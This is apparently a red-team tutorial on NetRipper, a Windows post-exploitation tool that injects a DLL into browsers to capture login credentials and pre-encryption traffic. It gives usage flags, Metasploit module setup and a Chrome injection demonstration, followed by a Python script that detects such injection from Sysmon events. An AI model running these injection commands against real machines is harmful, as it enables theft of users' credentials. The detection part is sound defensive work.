Red Team Offense and Defense: Harvesting Passwords from Memory

0X01 NetRipper

NetRipper is a post-exploitation tool for Windows. It uses API hooking to intercept the network traffic and encryption-related functions of a low-privileged user, so that it can capture plaintext traffic as well as encrypted traffic before it is encrypted or after it is decrypted.

0X02 Usage

Injection: NetRipper.exe DLLpath.dll processname.exe  
Example: NetRipper.exe DLL.dll firefox.exe

Generate DLL:

-h, --help Print this help message
-w, --write Full path for the DLL to write the configuration data
-l, --location Full path where to save data files (default TEMP)

Plugins:

-p, --plaintext Capture only plain-text data. E.g. true
-d, --datalimit Limit capture size per request. E.g. 4096
-s, --stringfinder Find specific strings. E.g. user,pass,config

Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass

Metasploit module

msf exploit(multi/handler) > use post/windows/gather/netripper/netripper
msf post(windows/gather/netripper/netripper) > show options

Module options (post/windows/gather/netripper/netripper):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DATALIMIT     65535            no        The number of bytes to save from requests/responses
   DATAPATH      TEMP             no        Where to save files. E.g. C:\Windows\Temp or TEMP
   DLLPATH                        no        Where to find NetRipper DLLs. Default is /usr/share/metasploit-framework...
   PLAINTEXT     false            no        True to save only plain-text data
   PROCESSIDS                     no        Process IDs. E.g. 1244,1256
   PROCESSNAMES                   no        Process names. E.g. firefox.exe,chrome.exe
   SESSION                        yes       The session to run this module on.
   STRINGFINDER  DEFAULT          no        Search for specific strings in captured data

Set PROCESSNAMES or PROCESSIDS and run the module.

Metasploit installation (Kali)

  1. mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
  2. cp Metasploit/netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb
  3. cp x86/DLL.x86.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll
  4. cp x64/DLL.x64.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll

Metasploit installation (trunk)

  1. mkdir /opt/metasploit-framework/modules/post/windows/gather/netripper
  2. cp Metasploit/netripper.rb /opt/metasploit-framework/modules/post/windows/gather/netripper/netripper.rb
  3. cp x86/DLL.x86.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x86.dll
  4. cp x64/DLL.x64.dll /opt/metasploit-framework/modules/post/windows/gather/netripper/DLL.x64.dll

0x03 Demonstration

Run the following command to inject the DLL into the Chrome browser process:

NetRipper.x64.exe "C:\Users\ailishi\Downloads\NetRipper-master\x64\DLL.x64.dll" chrome.exe

Then simply log in to any website.

After logging in to a website, check the TEMP directory for the captured data.

The same works through PowerShell.
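
From the defender's side, the injection shown above leaves two distinct traces in Sysmon telemetry: a remote thread created in the browser by an unknown binary (Event ID 8) and the browser loading an unsigned DLL from a user-writable directory such as Downloads (Event ID 7). The Python script below, added here as an example and not code from the original post or the NetRipper project, runs those two checks over constructed Sysmon-style events. The event field names (Image, ImageLoaded, Signed, SourceImage, TargetImage) follow Sysmon's schema; the sample events, the user name `alice`, the browser list and the `csrss.exe` allowlist are assumptions for the example and should be tuned to the environment.

```python
"""Detect NetRipper-style DLL injection into browsers from Sysmon-like events.
Added example: constructed input, not NetRipper project code."""
import json
from typing import Iterable, Optional

# Processes the page demonstrates injection into (chrome.exe, firefox.exe) plus two more browsers.
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}

# Locations a low-privileged user can write to; the demo above loads the DLL from Downloads.
USER_WRITABLE_MARKERS = ("\\downloads\\", "\\temp\\", "\\users\\public\\")

# DLLs under these roots are expected; anything else entering a browser gets a closer look.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Windows components that legitimately create threads in other processes (assumed allowlist).
ALLOWED_INJECTORS = {"csrss.exe"}


def base_name(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def check_image_load(ev: dict) -> Optional[dict]:
    """Sysmon Event ID 7 (Image loaded): a browser pulls in an unsigned or user-writable DLL."""
    if base_name(ev["Image"]) not in BROWSERS:
        return None
    dll = ev["ImageLoaded"].lower()
    signed = str(ev.get("Signed", "true")).lower() == "true"
    if signed and dll.startswith(TRUSTED_ROOTS):
        return None  # signed DLL from a system location: normal browser behaviour
    reasons = []
    if any(marker in dll for marker in USER_WRITABLE_MARKERS):
        reasons.append("dll in user-writable directory")
    if not signed:
        reasons.append("dll unsigned")
    if not reasons:
        return None
    return {"rule": "browser_loads_untrusted_dll", "process": ev["Image"],
            "dll": ev["ImageLoaded"], "reasons": reasons}


def check_remote_thread(ev: dict) -> Optional[dict]:
    """Sysmon Event ID 8 (CreateRemoteThread): the usual way an injector drives a DLL into a target."""
    if base_name(ev["TargetImage"]) not in BROWSERS:
        return None
    if base_name(ev["SourceImage"]) in ALLOWED_INJECTORS:
        return None
    return {"rule": "remote_thread_into_browser", "source": ev["SourceImage"],
            "target": ev["TargetImage"]}


CHECKS = {7: check_image_load, 8: check_remote_thread}


def scan_events(events: Iterable[dict]) -> list:
    """Apply the per-event-ID checks in order and collect the alerts they raise."""
    alerts = []
    for ev in events:
        check = CHECKS.get(int(ev.get("EventID", 0)))
        if check:
            alert = check(ev)
            if alert:
                alerts.append(alert)
    return alerts


def scan_log(lines: Iterable[str]) -> list:
    """Same scan over a JSON-lines export, one Sysmon event per line; blank lines are skipped."""
    return scan_events(json.loads(line) for line in lines if line.strip())


# Constructed sample events: user name, paths and ordering are made up for this example.
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": CHROME, "ImageLoaded": r"C:\Windows\System32\ws2_32.dll", "Signed": "true"},
    {"EventID": 8, "SourceImage": r"C:\Users\alice\Downloads\NetRipper-master\x64\NetRipper.x64.exe",
     "TargetImage": CHROME},
    {"EventID": 7, "Image": CHROME,
     "ImageLoaded": r"C:\Users\alice\Downloads\NetRipper-master\x64\DLL.x64.dll", "Signed": "false"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": CHROME},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe"},  # no check registered for EID 1
]

if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Running the script on the sample events yields two alerts: the remote thread from NetRipper.x64.exe into chrome.exe, and the unsigned DLL loaded from Downloads. The signed ws2_32.dll load and the csrss.exe thread are suppressed. The capture files NetRipper writes to TEMP are a weaker third signal, since browsers write there routinely, so they are not used as a rule here.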

0x04 Approach

On a compromised host, injecting into a process in this way yields sensitive information; the technique can also be combined with MSF.

0x05 Reference: project homepage

https://github.com/NytroRST/NetRipper